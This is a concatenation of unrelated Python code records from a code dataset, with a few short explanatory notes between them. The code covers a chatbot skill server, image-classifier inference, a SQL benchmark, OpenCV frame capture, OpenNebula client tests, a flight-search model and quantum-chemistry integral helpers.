None\n\n model = build_model(config, download=download)\n\n endpoint_description = {\n 'description': 'A skill endpoint',\n 'parameters': [\n {\n 'name': 'data',\n 'in': 'body',\n 'required': 'true',\n 'example': {\n 'version': '0.9.3',\n 'dialogs': [\n {\n 
'id': '5c65706b0110b377e17eba41',\n 'location': None,\n 'utterances': [\n {\n \"id\": \"5c62f7330110b36bdd1dc5d7\",\n \"text\": \"Привет!\",\n \"user_id\": \"5c62f7330110b36bdd1dc5d5\",\n \"annotations\": {\n \"ner\": {},\n \"coref\": {},\n \"sentiment\": {},\n \"obscenity\": {}\n },\n \"date\": \"2019-02-12 16:41:23.142000\"\n },\n {\n \"id\": \"5c62f7330110b36bdd1dc5d8\",\n \"active_skill\": \"chitchat\",\n \"confidence\": 0.85,\n \"text\": \"Привет, я бот!\",\n \"user_id\": \"5c62f7330110b36bdd1dc5d6\",\n \"annotations\": {\n \"ner\": {},\n \"coref\": {},\n \"sentiment\": {},\n \"obscenity\": {}\n },\n \"date\": \"2019-02-12 16:41:23.142000\"\n },\n {\n \"id\": \"5c62f7330110b36bdd1dc5d9\",\n \"text\": \"Как дела?\",\n \"user_id\": \"5c62f7330110b36bdd1dc5d5\",\n \"annotations\": {\n \"ner\": {},\n \"coref\": {},\n \"sentiment\": {},\n \"obscenity\": {}\n },\n \"date\": \"2019-02-12 16:41:23.142000\"\n }\n ],\n 'user': {\n 'id': '5c62f7330110b36bdd1dc5d5',\n 'user_telegram_id': '44d279ea-62ab-4c71-9adb-ed69143c12eb',\n 'user_type': 'human',\n 'device_type': None,\n 'persona': None\n },\n 'bot': {\n 'id': '5c62f7330110b36bdd1dc5d6',\n 'user_telegram_id': '56f1d5b2-db1a-4128-993d-6cd1bc1b938f',\n 'user_type': 'bot',\n 'device_type': None,\n 'personality': None\n },\n 'channel_type': 'telegram'\n }\n ]\n }\n }\n ],\n 'responses': {\n \"200\": {\n \"description\": \"A skill response\",\n 'example': {\n 'responses': [{name: 'sample-answer' for name in model.out_params}]\n }\n }\n }\n }\n\n @app.route('/')\n def index():\n return redirect('/apidocs/')\n\n @app.route(endpoint, methods=['POST'])\n @swag_from(endpoint_description)\n def answer():\n return interact_skill(model, batch_size)\n\n app.run(host=host, port=port, threaded=False, ssl_context=ssl_context)\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n skill_server(args.config, port=args.port, host=args.host, endpoint=args.endpoint)\n","sub_path":"core/run_dp_servers.py","file_name":"run_dp_servers.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
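The servicer above accepts a POST of {'dialogs': [...]} at the configured endpoint and replies with {'responses': [...]}, one dict per dialog keyed by the model's out_params. One caveat in the record: endpoint = f'/{endpoint}' or '/skill' can never fall back to '/skill', because the f-string is non-empty even when endpoint is None (it becomes '/None'); the intended guard would be f'/{endpoint}' if endpoint else '/skill'. A minimal client sketch against assumed defaults (host 0.0.0.0, port 80, endpoint /skill; adjust to whatever was passed on the command line):

import requests

payload = {'version': '0.9.3', 'dialogs': []}   # dialog objects as in the swagger example above
resp = requests.post('http://0.0.0.0:80/skill', json=payload, timeout=10)
resp.raise_for_status()
print(resp.json()['responses'])                 # one dict per dialog, keyed by model.out_params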
+{"seq_id":"609381102","text":"import torch\n# from src.helper_functions.helper_functions import parse_args\nfrom src.models import create_model\nimport argparse\nimport numpy as np\nfrom PIL import Image\nfrom src.models.tresnet import TResNet\n\n\ndef infer_batch(model, classes_list, inputs, threshold=0.7):\n # inputs: batch, channel, height, weight\n # print('ASL Example Inference code on a batch of images')\n\n output = torch.sigmoid(model(inputs))\n\n probs = output.cpu().detach().numpy()\n labels = []\n labels_probs = []\n\n # print(type(classes_list))\n # numpy array\n\n for i in range(0, inputs.shape[0]):\n np_output = probs[i, :]\n # print(np_output.shape)\n detected_classes = classes_list[np_output > threshold]\n # print(detected_classes)\n labels.append(detected_classes)\n labels_probs.append(np_output[np_output > threshold])\n\n return probs, labels, labels_probs\n\n\ndef load_model(model_type):\n\n if model_type is \"L\":\n model_name = \"tresnet_l\"\n path = './pth_files/MS_COCO_TRresNet_L_448_86.6.pth'\n input_size = 448\n threshold = 0.5\n elif model_type is \"XL\":\n model_name = \"tresnet_xl\"\n path = './pth_files/MS_COCO_TResNet_xl_640_88.4.pth'\n input_size = 640\n threshold = 0.5\n\n state = torch.load(path, map_location='cpu')\n num_classes = state['num_classes']\n\n if model_type is \"L\":\n do_bottleneck_head = False\n model = TResNet(layers=[4, 5, 18, 3], num_classes=num_classes, in_chans=3, width_factor=1.2,\n do_bottleneck_head=do_bottleneck_head)\n elif model_type is \"XL\":\n model = TResNet(layers=[4, 5, 24, 3], num_classes=num_classes, in_chans=3, width_factor=1.3)\n\n model = model.cuda()\n model.load_state_dict(state['model'], strict=True)\n model.eval()\n\n classes_list = np.array(list(state['idx_to_class'].values()))\n\n return model, input_size, threshold, num_classes, classes_list\n\n\ndef test_single():\n\n model, input_size, threshold, num_classes, classes_list = load_model(\"L\")\n\n pic_path = './pics/000000000885.jpg'\n\n im = Image.open(pic_path)\n im_resize = im.resize((input_size, input_size))\n np_img = np.array(im_resize, dtype=np.uint8)\n np_imgs = np.stack([np_img, np_img])\n print(np_imgs.shape)\n tensor_img = torch.from_numpy(np_imgs).permute(0, 3, 1, 2).float() / 255.0 # HWC to CHW\n\n tensor_batch = tensor_img.cuda()\n\n probs, labels, labels_probs = infer_batch(model, classes_list, tensor_batch, threshold)\n print(probs)\n print(labels)\n print(labels_probs)\n\n\ndef test_with_loader():\n\n # model, input_size, threshold, num_classes, classes_list = load_model(\"XL\")\n model, input_size, threshold, num_classes, classes_list = load_model(\"L\")\n\n\n from torchvision.transforms import transforms\n from data_loader import CocoObject\n from torch.autograd import Variable\n from sklearn.metrics import average_precision_score\n import torch.nn as nn\n from tqdm import tqdm as tqdm\n # crop_size = 224\n # image_size = 256\n # batch_size = 4\n batch_size = 12\n # normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n # std=[0.229, 0.224, 0.225])\n\n val_transform = transforms.Compose([\n transforms.Resize([input_size, input_size]),\n # transforms.CenterCrop(crop_size),\n transforms.ToTensor(),\n ])\n\n # Data samplers.\n ann_dir = '/home/ytianas/EMSE_COCO/cocodataset/annotations'\n image_dir = '/home/ytianas/EMSE_COCO/cocodataset/'\n test_data = CocoObject(ann_dir=ann_dir, image_dir=image_dir,\n split='test', transform=val_transform)\n image_ids = test_data.image_ids\n image_path_map = test_data.image_path_map\n # 80 objects\n 
id2object = test_data.id2object\n id2labels = test_data.id2labels\n # Data loaders / batch assemblers.\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size,\n shuffle=False, num_workers=4,\n pin_memory=True)\n count = 0\n yhats = []\n labels = []\n imagefiles = []\n res = list()\n\n t = tqdm(test_loader, desc = 'testing')\n\n for batch_idx, (images, objects, image_ids) in enumerate(t):\n\n images = Variable(images).cuda()\n objects = Variable(objects).cuda()\n\n # print(images.shape)\n\n object_preds = model(images)\n m = nn.Sigmoid()\n object_preds_r = m(object_preds)\n\n count = count + len(image_ids)\n for i in range(len(image_ids)):\n image_file_name = image_path_map[int(image_ids[i])]\n yhat = []\n label = id2labels[int(image_ids[i])]\n\n for j in range(len(object_preds[i])):\n a = object_preds_r[i][j].cpu().data.numpy()\n if a > threshold:\n yhat.append(id2object[j])\n\n yhats.append(yhat)\n labels.append(label)\n imagefiles.append(image_file_name)\n\n\n res.append((image_ids, object_preds.data.cpu(), objects.data.cpu()))\n if count % 1000 == 0:\n print(\"count: \" + str(count))\n\n preds_object = torch.cat([entry[1] for entry in res], 0)\n targets_object = torch.cat([entry[2] for entry in res], 0)\n eval_score_object = average_precision_score(targets_object.numpy(), preds_object.numpy())\n print('\\nmean average precision of object classifier on test data is {}\\n'.format(eval_score_object))\n\n\nif __name__ == '__main__':\n\n # test_single()\n test_with_loader()","sub_path":"infer_batch.py","file_name":"infer_batch.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
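load_model in the record above tests model_type with the identity operator (if model_type is "L":). That compares object identity, not equality; it only works when CPython happens to intern the literals, and Python 3.8+ flags it with a SyntaxWarning. The equality operator is the correct test:

# string comparison should use ==, not is
if model_type == "L":
    model_name = "tresnet_l"
elif model_type == "XL":
    model_name = "tresnet_xl"
else:
    raise ValueError(f"unknown model_type: {model_type!r}")   # fail loudly instead of leaving names unbound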
+{"seq_id":"130956537","text":"import os\nimport csv\nimport pyodbc\nimport time\nimport random\n\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\n\ndef reset(cursor):\n\twith open('proxi_mk01.ddl','r') as f:\n\t\tsqlScript = f.read()\n\t\tstatements = sqlScript.split(';')\n\t\tstart_time = current_milli_time()\n\t\tfor statement in statements:\n\t\t\tstatement += ';'\n\t\t\tcursor.execute(statement)\n\t\t\tcursor.commit()\n\ndef runSQL(size):\n\tprint('Running SQL')\n\tresults = {'ID': 'SQL', 'SIZE': size}\n\n\t# SQL SERVER\n\tsqlexpress02 = 'Server=localhost\\\\SQLEXPRESS02;Database=master;Trusted_Connection=True;'\n\t# print(\"Establishing Connection...\")\n\n\tstart_time = current_milli_time()\n\tsql_conn = pyodbc.connect('Driver={SQL Server};'\n\t 'Server=localhost\\\\SQLEXPRESS02;'\n\t 'Database=master;'\n\t 'Trusted_Connection=yes;')\n\tend_time = current_milli_time()\n\n\trun_time = end_time - start_time\n\t# print(\"Connected in {} ms\".format(run_time))\n\tresults['EC'] = run_time\n\tcursor = sql_conn.cursor()\n\n\terr_line = ''\n\ttry:\n\t\t# Define Model\n\t\t# print(\"Defining Model...\")\n\t\tinputdir = 'proxi_mk01.ddl'\n\n\t\t# with open(inputdir,'r') as f:\n\t\t# \tsqlScript = f.read()\n\t\t# \tstatements = sqlScript.split(';')\n\t\t# start_time = current_milli_time()\n\t\t# reset(cursor)\n\t\t# # \tfor statement in statements:\n\t\t# # \t\tstatement += ';'\n\t\t# # \t\tcursor.execute(statement)\n\t\t# end_time = current_milli_time()\n\t\t# run_time = end_time - start_time\n\t\t# # print(\"Model Defined in {} ms\".format(run_time))\n\t\t# results['DD'] = [run_time]\n\n\t\t# # num_runs = [1, 5, 10, 100, 250, 500]\n\t\t# # for run in num_runs:\n\t\t# # \tprint(\"Loading {} of data...\".format(run))\n\t\t# # \twith open('sql_data.sql', 'r') as f:\n\t\t# # \t\tstart_time = current_milli_time()\n\t\t# # \t\tfor i in range(0, run):\n\t\t# # \t\t\tline = next(f)\n\t\t# # \t\t\terr_line = line\n\t\t# # \t\t\tcursor.execute(line)\n\t\t# # \t\t\tcursor.commit()\n\t\t# # \t\tend_time = current_milli_time()\n\t\t# # \t\trun_time = end_time - start_time\n\t\t# # \t\tprint(\"Data loaded in {} ms\".format(run_time))\n\t\t# # \t\tresults['DL{}'.format(run)] = run_time\n\n\t\t# # Resetting\n\t\t# # print(\"Resetting...\")\n\t\t# with open(inputdir,'r') as f:\n\t\t# \tsqlScript = f.read()\n\t\t# \tstatements = sqlScript.split(';')\n\t\t# \tstart_time = current_milli_time()\n\t\t# \tfor statement in statements:\n\t\t# \t\tstatement += ';'\n\t\t# \t\tcursor.execute(statement)\n\t\t# \tend_time = current_milli_time()\n\t\t# \trun_time = end_time - start_time\n\t\t# # print(\"Model Defined in {} ms\".format(run_time))\n\t\t# results['DD'].append(run_time)\n\n\n\t\t# # Load All Data\n\t\t# # print(\"Loading All Data...\")\n\t\t# with open('sql_data.sql', 'r') as f:\n\t\t# \tstart_time = current_milli_time()\n\t\t# \tfor line in f:\n\t\t# \t\terr_line = line\n\t\t# \t\ttry:\n\t\t# \t\t\tcursor.execute(line)\n\t\t# \t\t\tcursor.commit()\n\t\t# \t\texcept:\n\t\t# \t\t\tprint(\"FAILED: \" + err_line)\n\t\t# \tend_time = current_milli_time()\n\t\t# \trun_time = end_time - start_time\n\t\t# \t# print(\"Data loaded in {} ms\".format(run_time))\n\t\t# \tresults['DL*'] = run_time\n\n\t\t# Run Queries\n\t\tqueries = []\n\t\tqueries.append(\"SELECT * FROM Users WHERE user_id = {};\")\n\t\t# queries.append(\"SELECT * FROM Users WHERE user_name = 'craigjohn';\")\n\t\tqueries.append(\"SELECT Y.name FROM Users AS X, Users as Y, User_to_Interest as UI WHERE X.user_id = {} AND X.user_id = UI.user_id 
AND Y.user_id IN (SELECT SUI.user_id FROM User_to_Interest as SUI WHERE SUI.interest_id = UI.interest_id AND NOT SUI.user_id = X.user_id);\")\n\t\tqueries.append(\"SELECT U.user_name FROM Users as U, isFriendsWith as IFW WHERE IFW.user_id = {} AND IFW.friend_id = U.user_id\")\n\t\tqueries.append(\"SELECT DISTINCT G.group_name FROM Users as U, Groups as G, isFriendsWith as IFW, isMember as IM WHERE U.user_id = {} AND G.group_id = IM.group_id AND U.user_id = IFW.user_id AND IFW.friend_id = IM.user_id;\")\n\t\tqueries.append(\"SELECT U.user_name FROM Users as U, Events as E, isMember as IM, isAttending as IA WHERE IM.user_id = {} AND E.group_id = IM.group_id AND IA.event_id = E.event_id AND IA.user_id = U.user_id;\")\n\t\tqueries.append(\"SELECT I.interest_name FROM User_to_Interest as UI, Group_to_Interest as GI, Events as E, isAttending as IA, User_to_Interest as UI2, Interests as I WHERE UI.user_id = {} AND UI.interest_id = GI.interest_id AND E.group_id = GI.group_id AND IA.event_id = E.event_id AND IA.user_id = UI2.user_id AND UI2.interest_id = I.interest_id;\")\n\n\n\t\tquery_tags = []\n\t\tnum_runs = 1\n\t\tnum_repeats = 100\n\t\tfor j in range(0, num_runs):\n\t\t\tfor i in range(0, len(queries)):\n\t\t\t\t# print(\"Running Query \", i)\n\t\t\t\tstart_time = current_milli_time()\n\t\t\t\tfor x in range(0, num_repeats):\n\t\t\t\t\tuser_id = random.randint(1, 1000)\n\t\t\t\t\trst = cursor.execute(queries[i].format(user_id))\n\t\t\t\t\tcount = 0\n\t\t\t\t\tfor ele in rst:\n\t\t\t\t\t\tcount += 1\n\t\t\t\tend_time = current_milli_time()\n\t\t\t\trun_time = end_time - start_time\n\t\t\t\t# print(\"Query {} ran in {} ms\".format(i, run_time))\n\t\t\t\ttag = 'Q{} - {}'.format(i, num_repeats)\n\t\t\t\tresults[tag] = run_time\n\t\t\t\tquery_tags.append(tag)\n\n\t\tfor tag in query_tags:\n\t\t\tresults[tag] = results[tag] / num_runs\n\n\t\twith open(\"sql-results.csv\", \"a\", newline='') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\tfor key, value in results.items():\n\t\t\t\twriter.writerow([key, value])\n\t\t\tf.write('||')\n\texcept Exception as e:\n\t\tprint(err_line)\n\t\tprint(e)\n\tfinally:\n\t\tprint(results)\n\t\tsql_conn.close()\n\n# cursor.execute('SELECT * FROM Users')\n# for row in cursor:\n# print(row)\n\n# print(\"Dropping Tables...\")\n# with open('sql_drop_tables.sql', 'r') as f:\n# \tstart_time = current_milli_time()\n# \tfor line in f:\n# \t\terr_line = line\n# \t\tcursor.execute(line)\n# \t\tcursor.commit()\n# \tend_time = current_milli_time()\n# \trun_time = end_time - start_time\n# \tprint(\"Tables Dropped in {} ms\".format(run_time))\n# \tresults['DT'] = run_time\n\nrunSQL(100000)","sub_path":"Files/main_sql.py","file_name":"main_sql.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
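+# A minimal sketch of a safer variant of the query loop in main_sql.py above:
+# pyodbc can bind parameters itself instead of interpolating values with
+# str.format(). The connection string and Users table are assumptions taken
+# from that record; this is not part of the benchmark itself.
+import pyodbc
+
+conn = pyodbc.connect('Driver={SQL Server};'
+                      'Server=localhost\\SQLEXPRESS02;'
+                      'Database=master;'
+                      'Trusted_Connection=yes;')
+cursor = conn.cursor()
+row = cursor.execute("SELECT * FROM Users WHERE user_id = ?", 42).fetchone()
+conn.close()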
+{"seq_id":"119905142","text":"import cv2 \nimport numpy\n\n#cap = cv2.VideoCapture(\"I:\\_Project\\RandImage\\VID_20180325_204303.mp4\")\ncap = cv2.VideoCapture(\"I:\\_Project\\RandImage\\VID_20180325_215149.mp4\")\n\niCount = 0\nwhile(1):\n \n # get a frame\n ret, frame = cap.read()\n iCount = iCount + 1\n \n print( iCount )\n if iCount < 30*30 : \n continue;\n \n # show a frame\n if 1 :\n cv2.imshow(\"capture\", frame)\n if cv2.waitKey(1111) & 0xFF == ord('q'):\n break\n else:\n cv2.imwrite( \"I:\\_Project\\RandImage\\DebugImg\\%08d.png\"%(iCount) , frame) \n","sub_path":"test_ReadMp4.py","file_name":"test_ReadMp4.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"65666005","text":"# coding: utf-8\n\n# Copyright 2018 www.privaz.io Valletech AB\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport ssl\nimport os\nfrom pyone import HOST_STATES, HOST_STATUS, OneException, OneAuthenticationException\n\nos.environ[\"PYONE_TEST_FIXTURE\"]=\"yes\"\nos.environ[\"PYONE_TEST_FIXTURE_FILE\"]=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'integration.json.gz')\nos.environ[\"PYONE_TEST_FIXTURE_REPLAY\"]=\"yes\"\n\n# Note that we import a TesterServer that has extends with record/replay fixtures\nfrom pyone.server import OneServer\n\n# Deprecated utility, testing backward compatibility\nfrom pyone.util import one2dict\n\n# Capture OpenNebula Session parameters from environment or hardcoded...\ntest_session = os.getenv(\"PYONE_SESSION\", \"oneadmin:onepass\")\ntest_endpoint = os.getenv(\"PYONE_ENDPOINT\", 'https://192.168.121.78/RPC2')\n\n# Disable SSL checks for TEST environment only, and deal with Centos, see issue #13\nif \"PYTHONHTTPSVERIFY\" in os.environ:\n one = OneServer(test_endpoint, session=test_session)\nelse:\n one = OneServer(test_endpoint, session=test_session, context=ssl._create_unverified_context())\n\n# Test Objects\ntestHostAId = None\ntestHostBId = None\ntestVMAid = None\n\nclass IntegrationTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"\n Will define test resources from the pool\n anyone should do\n :return:\n \"\"\"\n\n global testHostAId, testHostBId, testVMAid\n\n one.set_fixture_unit_test(\"setup\")\n hosts = one.hostpool.info()\n testHostAId = hosts.HOST[0].ID\n testHostBId = hosts.HOST[1].ID\n vms = one.vmpool.info(-2, -1, -1, -1)\n testVMAid = vms.VM[0].ID\n\n def test_pool_info(self):\n one.set_fixture_unit_test(\"test_pool_info\")\n hostpool = one.hostpool.info()\n self.assertGreater(len(hostpool.HOST), 0)\n host = hostpool.HOST[0]\n self.assertIn(HOST_STATES(host.STATE), [HOST_STATES.MONITORED, HOST_STATES.INIT])\n\n def test_market_info(self):\n one.set_fixture_unit_test(\"test_market_info\")\n marketpool = one.marketpool.info()\n self.assertGreater(len(marketpool.MARKETPLACE), 0)\n m0 = marketpool.MARKETPLACE[0]\n self.assertEqual(m0.NAME, \"OpenNebula Public\")\n\n def test_vm_pool(self):\n one.set_fixture_unit_test(\"test_vm_pool\")\n vmpool = one.vmpool.info(-2, -1, -1, -1)\n vm0 = vmpool.VM[0]\n self.assertEqual(vm0.UNAME, \"oneadmin\")\n\n def test_invalid_method(self):\n with self.assertRaises(OneException):\n one.set_fixture_unit_test(\"test_invalid_method\")\n one.invalid.api.call()\n\n def test_template_attribute_vector_parameter(self):\n one.set_fixture_unit_test(\"test_template_attribute_vector_parameter\")\n one.host.update(testHostAId, {\"LABELS\": \"HD,LOWPOWER\"}, 1)\n host = one.host.info(testHostAId)\n self.assertEqual(host.TEMPLATE['LABELS'], u\"HD,LOWPOWER\")\n\n def test_xml_template_parameter(self):\n one.set_fixture_unit_test(\"test_xml_template_parameter\")\n one.host.update(testHostBId,\n {\n 'TEMPLATE': {\n 'LABELS': 
'SSD',\n 'MAX_CPU': '176'\n }\n }, 1)\n host = one.host.info(testHostBId)\n self.assertEqual(host.TEMPLATE['LABELS'], u\"SSD\")\n self.assertEqual(host.TEMPLATE['MAX_CPU'], u\"176\")\n\n def test_empty_dictionary(self):\n with self.assertRaises(Exception):\n one.set_fixture_unit_test(\"test_empty_dictionary\")\n one.host.update(testHostAId, {}, 1)\n\n def test_retrieve_template_as_DOM_no_longer_working(self):\n with self.assertRaises(AttributeError):\n one.set_fixture_unit_test(\"test_retrieve_template_as_DOM_no_longer_working\")\n host = one.host.info(testHostAId)\n template = host.TEMPLATE.toDOM()\n arch = template.getElementsByTagName('ARCH')[0].firstChild.nodeValue\n self.assertEqual(arch, 'x86_64')\n\n def test_retrieve_template_as_deprecated_dict(self):\n one.set_fixture_unit_test(\"test_retrieve_template_as_deprecated_dict\")\n host = one.host.info(testHostAId)\n tdict = one2dict(host.TEMPLATE)\n arch = tdict['TEMPLATE']['ARCH']\n self.assertEqual(arch, 'x86_64')\n\n def test_retrieve_template_as_new_dict(self):\n one.set_fixture_unit_test(\"test_retrieve_template_as_new_dict\")\n host = one.host.info(testHostAId)\n arch = host.TEMPLATE['ARCH']\n self.assertEqual(arch, 'x86_64')\n\n def test_international_characters_issue_006(self):\n one.set_fixture_unit_test(\"test_international_characters_issue_006\")\n one.host.update(testHostAId,\n {\n 'TEMPLATE': {\n 'NOTES': 'Hostname is: ESPAÑA',\n }\n }, 1)\n host = one.host.info(testHostAId)\n self.assertIn(host.TEMPLATE['NOTES'], [u\"Hostname is: ESPAÑA\"])\n\n def test_modify_template(self):\n one.set_fixture_unit_test(\"test_modify_template\")\n host = one.host.info(testHostAId)\n host.TEMPLATE[\"NOTES\"]=u\"Hostname is: España\"\n one.host.update(testHostAId, host.TEMPLATE, 1)\n host2 = one.host.info(testHostAId)\n self.assertIn(host2.TEMPLATE['NOTES'], [u\"Hostname is: España\"])\n\n\n def test_vm_info(self):\n one.set_fixture_unit_test(\"test_vm_info\")\n vm = one.vm.info(testVMAid)\n labels = vm.USER_TEMPLATE.get('LABELS', \"\")\n culsterId = vm.TEMPLATE['DISK']['CLUSTER_ID']\n self.assertEqual(vm.ID,testVMAid)\n\n def test_market_info(self):\n one.set_fixture_unit_test(\"test_market_info\")\n markets = one.marketpool.info()\n self.assertEqual(markets.MARKETPLACE[0].NAME, \"OpenNebula Public\")\n\n def test_maketplace_app_info(self):\n one.set_fixture_unit_test(\"test_maketplace_app_info\")\n maketplace_apps= one.marketapppool.info(-2, -1, -1)\n self.assertEqual(maketplace_apps.MARKETPLACEAPP[0].GNAME, 'oneadmin')\n\n def test_app_export(self):\n one.set_fixture_unit_test(\"test_app_export\")\n one.marketapp.export(6)\n\n def test_datastore_info(self):\n one.set_fixture_unit_test(\"test_datastore_info\")\n datastores = one.datastorepool.info()\n self.assertEqual(datastores.DATASTORE[0].GNAME,\"oneadmin\")\n\n\n def test_marshalling_enums(self):\n one.set_fixture_unit_test(\"test_marshalling_enums\")\n self.assertTrue(one.host.status(testHostAId, HOST_STATUS.ENABLED))\n\n @classmethod\n def tearDownClass(cls):\n one.server_close()\n\n\nclass AuthenticationTest(unittest.TestCase):\n def test_auth_error(self):\n with self.assertRaises(OneAuthenticationException):\n afixture_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'fixtures', 'auth.json.gz')\n # Disable SSL checks for TEST environment only, and deal with Centos, see issue #13\n if \"PYTHONHTTPSVERIFY\" in os.environ:\n xone = OneServer(test_endpoint, fixture_file=afixture_file, session=\"oneadmin:invalidpass\")\n else:\n xone = OneServer(test_endpoint, 
fixture_file=afixture_file, session=\"oneadmin:invalidpass\", context=ssl._create_unverified_context())\n\n xone.set_fixture_unit_test(\"test_auth_error\")\n try:\n xone.hostpool.info()\n finally:\n xone.server_close()\n","sub_path":"tests/integration/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":7989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"272546062","text":"from datetime import datetime, timedelta\n\n\nclass FlightSearch:\n def __init__(self, source, destination, from_date, to_date):\n self.departureStation: str = source\n self.arrivalStation: str = destination\n self.from_date: str = from_date\n self.to_date: str = to_date\n\n def to_dictionary(self):\n if isinstance(self.from_date, datetime):\n self.from_date = self.from_date.strftime('%Y-%m-%d')\n self.to_date = self.to_date.strftime('%Y-%m-%d')\n return {\n \"departureStation\": self.departureStation,\n \"arrivalStation\": self.arrivalStation,\n \"from\": self.from_date,\n \"to\": self.to_date\n }\n","sub_path":"models/flightSearch.py","file_name":"flightSearch.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"291532254","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\nimport ctypes\nimport _ctypes\nimport numpy\nimport pyscf.lib\nfrom pyscf import gto\nfrom pyscf.scf import _vhf\n\nlibri = pyscf.lib.load_library('libri')\ndef _fpointer(name):\n return ctypes.c_void_p(_ctypes.dlsym(libri._handle, name))\n\ndef nr_auxe2(intor, basrange, atm, bas, env,\n aosym='s1', comp=1, cintopt=None, out=None, ijkoff=0,\n naoi=None, naoj=None, naoaux=None,\n iloc=None, jloc=None, kloc=None):\n assert(aosym[:2] in ('s1', 's2'))\n atm = numpy.asarray(atm, dtype=numpy.int32, order='C')\n bas = numpy.asarray(bas, dtype=numpy.int32, order='C')\n env = numpy.asarray(env, dtype=numpy.double, order='C')\n natm = ctypes.c_int(len(atm))\n nbas = ctypes.c_int(len(bas))\n i0, ic, j0, jc, k0, kc = basrange\n if 'ssc' in intor:\n if iloc is None: iloc = make_loc(i0, ic, _cgto_spheric(bas))\n if jloc is None: jloc = make_loc(j0, jc, _cgto_spheric(bas))\n if kloc is None: kloc = make_loc(k0, kc, _cgto_cart(bas))\n elif 'cart' in intor:\n if iloc is None: iloc = make_loc(i0, ic, _cgto_cart(bas))\n if jloc is None: jloc = make_loc(j0, jc, _cgto_cart(bas))\n if kloc is None: kloc = make_loc(k0, kc, _cgto_cart(bas))\n else:\n if iloc is None: iloc = make_loc(i0, ic, _cgto_spheric(bas))\n if jloc is None: jloc = make_loc(j0, jc, _cgto_spheric(bas))\n if kloc is None: kloc = make_loc(k0, kc, _cgto_spheric(bas))\n if naoi is None:\n naoi = iloc[-1] - iloc[0]\n if naoj is None:\n naoj = jloc[-1] - jloc[0]\n if naoaux is None:\n naoaux = kloc[-1] - kloc[0]\n\n if aosym in ('s1'):\n fill = _fpointer('RIfill_s1_auxe2')\n ij_count = naoi * naoj\n else:\n fill = _fpointer('RIfill_s2ij_auxe2')\n ij_count = iloc[-1]*(iloc[-1]+1)//2 - iloc[0]*(iloc[0]+1)//2\n if comp == 1:\n shape = (ij_count,naoaux)\n else:\n shape = (comp,ij_count,naoaux)\n if out is None:\n out = numpy.empty(shape)\n else:\n out = numpy.ndarray(shape, buffer=out)\n\n basrange = numpy.asarray(basrange, numpy.int32)\n fintor = _fpointer(intor)\n if cintopt is None:\n intopt = _vhf.make_cintopt(atm, bas, env, intor)\n else:\n intopt = cintopt\n libri.RInr_3c2e_auxe2_drv(fintor, fill,\n out.ctypes.data_as(ctypes.c_void_p),\n ctypes.c_size_t(ijkoff),\n ctypes.c_int(naoj), ctypes.c_int(naoaux),\n basrange.ctypes.data_as(ctypes.c_void_p),\n iloc.ctypes.data_as(ctypes.c_void_p),\n jloc.ctypes.data_as(ctypes.c_void_p),\n kloc.ctypes.data_as(ctypes.c_void_p),\n ctypes.c_int(comp), intopt,\n atm.ctypes.data_as(ctypes.c_void_p), natm,\n bas.ctypes.data_as(ctypes.c_void_p), nbas,\n env.ctypes.data_as(ctypes.c_void_p))\n if cintopt is None:\n libri.CINTdel_optimizer(ctypes.byref(intopt))\n return out\n\ndef totcart(bas):\n return ((bas[:,gto.ANG_OF]+1) * (bas[:,gto.ANG_OF]+2)//2 *\n bas[:,gto.NCTR_OF]).sum()\ndef totspheric(bas):\n return ((bas[:,gto.ANG_OF]*2+1) * bas[:,gto.NCTR_OF]).sum()\ndef make_loc(shl0, shlc, num_cgto):\n loc = numpy.empty(shlc+1, dtype=numpy.int32)\n off = 0\n for k, i in enumerate(range(shl0, shl0+shlc)):\n loc[k] = off\n off += num_cgto(i)\n loc[shlc] = off\n return loc\ndef _cgto_spheric(bas):\n return lambda i: (bas[i,gto.ANG_OF]*2+1) * bas[i,gto.NCTR_OF]\ndef _cgto_cart(bas):\n def fcart(i):\n l = bas[i,gto.ANG_OF]\n return (l+1)*(l+2)//2 * bas[i,gto.NCTR_OF]\n return fcart\n","sub_path":"df/_ri.py","file_name":"_ri.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
